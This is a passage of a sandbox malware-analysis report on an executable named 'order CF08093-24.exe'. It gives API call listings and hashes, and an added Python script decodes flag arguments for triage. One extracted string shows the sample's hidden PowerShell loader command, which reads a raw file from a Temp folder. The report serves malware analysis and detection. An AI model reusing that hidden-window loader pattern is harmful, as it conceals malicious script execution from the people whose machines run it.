                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                            • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                            • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                            • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
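The "APIs" entries in the blocks above are easier to triage once the hex arguments are decoded: the 04000000 passed as the sixth argument of CreateProcessW at 00405B4D is CREATE_DEFAULT_ERROR_MODE, and the 00000008 passed to LoadLibraryExW at 0040692B is LOAD_WITH_ALTERED_SEARCH_PATH, which together with the path assembled from GetSystemDirectoryW and wsprintfW in subcall 004068C5 means the DLL is loaded by full system-directory path rather than by search order. The following Python is an added example; it is not part of the Joe Sandbox report or its IDA plugin. It parses entries in the plain-text form shown on this page into per-function records, decodes the flag arguments it has tables for, and emits one API-sequence line per function that can be reused as a triage signature. The sample input is copied from the CreateProcessW, GetProcAddress and CreateFileW blocks above; the flag tables and the assumption that the sixth CreateProcessW argument, third LoadLibraryExW argument and third/sixth CreateFileW arguments are the flag parameters are the editor's, based on the documented Win32 prototypes.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' entries and decode selected flag arguments."""
import re
from typing import Dict, List, Optional, Union

# Constructed sample: API lines copied from the IDA-plugin entries on this page.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
• CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
• GetProcAddress.KERNEL32(00000000,?), ref: 00406962
  • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
  • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
  • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
APIs
• GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
"""

# One entry per line: optional subcall prefix, Api.Module, optional (args), ref: address.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# (API name, zero-based argument index) -> bit flag names taken from the Win32 headers.
FLAG_TABLES: Dict[tuple, Dict[int, str]] = {
    ("CreateProcessW", 5): {            # dwCreationFlags
        0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
        0x00000010: "CREATE_NEW_CONSOLE", 0x04000000: "CREATE_DEFAULT_ERROR_MODE",
        0x08000000: "CREATE_NO_WINDOW",
    },
    ("LoadLibraryExW", 2): {            # dwFlags
        0x00000001: "DONT_RESOLVE_DLL_REFERENCES", 0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
        0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    },
    ("CreateFileW", 2): {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"},
    ("CreateFileW", 5): {               # dwFlagsAndAttributes
        0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
        0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    },
}

Arg = Union[int, str, None]


def parse_args(raw: Optional[str]) -> List[Arg]:
    """'?' becomes None; hex tokens become ints; anything else (e.g. a path) stays a string."""
    if not raw:
        return []
    out: List[Arg] = []
    for tok in raw.split(","):
        tok = tok.strip()
        if tok == "?":
            out.append(None)
            continue
        try:
            out.append(int(tok, 16))
        except ValueError:
            out.append(tok)
    return out


def parse_blocks(text: str) -> List[List[dict]]:
    """Split the listing at each 'APIs' header; one block per analysed function."""
    blocks: List[List[dict]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        m = API_RE.match(line)
        if not m or not blocks:
            continue
        blocks[-1].append({
            "api": m["api"], "module": m["mod"], "args": parse_args(m["args"]),
            "ref": m["ref"].upper(), "subcall": m["sub"].upper() if m["sub"] else None,
        })
    return blocks


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every known bit in value; report any leftover bits as a hex remainder."""
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def decode_record(rec: dict) -> Dict[int, List[str]]:
    """Decode only the argument positions we have a table for; Joe's argument lists may be
    longer than the API's arity (stack residue), so the count itself is never trusted."""
    out: Dict[int, List[str]] = {}
    for (api, idx), table in FLAG_TABLES.items():
        if rec["api"] == api and idx < len(rec["args"]) and isinstance(rec["args"][idx], int):
            out[idx] = decode_flags(rec["args"][idx], table)
    return out


def api_sequence(block: List[dict]) -> List[str]:
    """Ordered API names of a function block, subcalls included, usable as a signature."""
    return [r["api"] for r in block]


def summarize(text: str) -> List[str]:
    lines: List[str] = []
    for block in parse_blocks(text):
        lines.append(" > ".join(api_sequence(block)))
        for rec in block:
            for idx, names in decode_record(rec).items():
                lines.append(f"    {rec['api']} @{rec['ref']} arg{idx} = {'|'.join(names)}")
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE)))
```

Run as-is it prints three signature lines with the decoded flags beneath them; to use it on a full report, feed the text of the "Execution Graph" function listing to summarize() and diff the signature lines against those of a known-clean installer stub.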
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                            • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                            • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                            • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                            • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                            • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                                            • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                            • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                            • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                                            • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                            • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                            • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                            • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                            • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                            • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                            • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                            • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                            APIs
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                              • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                                              • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                            • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                              • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                              • Part of subcall function 004067EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                            • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                              • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                              • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                              • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                            Strings
                                                                            • powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm, xrefs: 004049CA
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                                                            • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                            • A, xrefs: 00404AD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm
                                                                            • API String ID: 2624150263-2851819861
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405C76
                                                                            • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CBE
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CE1
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CE7
                                                                            • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CF7
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\order CF08093-24.exe", xrefs: 00405C56
                                                                            • \*.*, xrefs: 00405CB8
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-3890829713
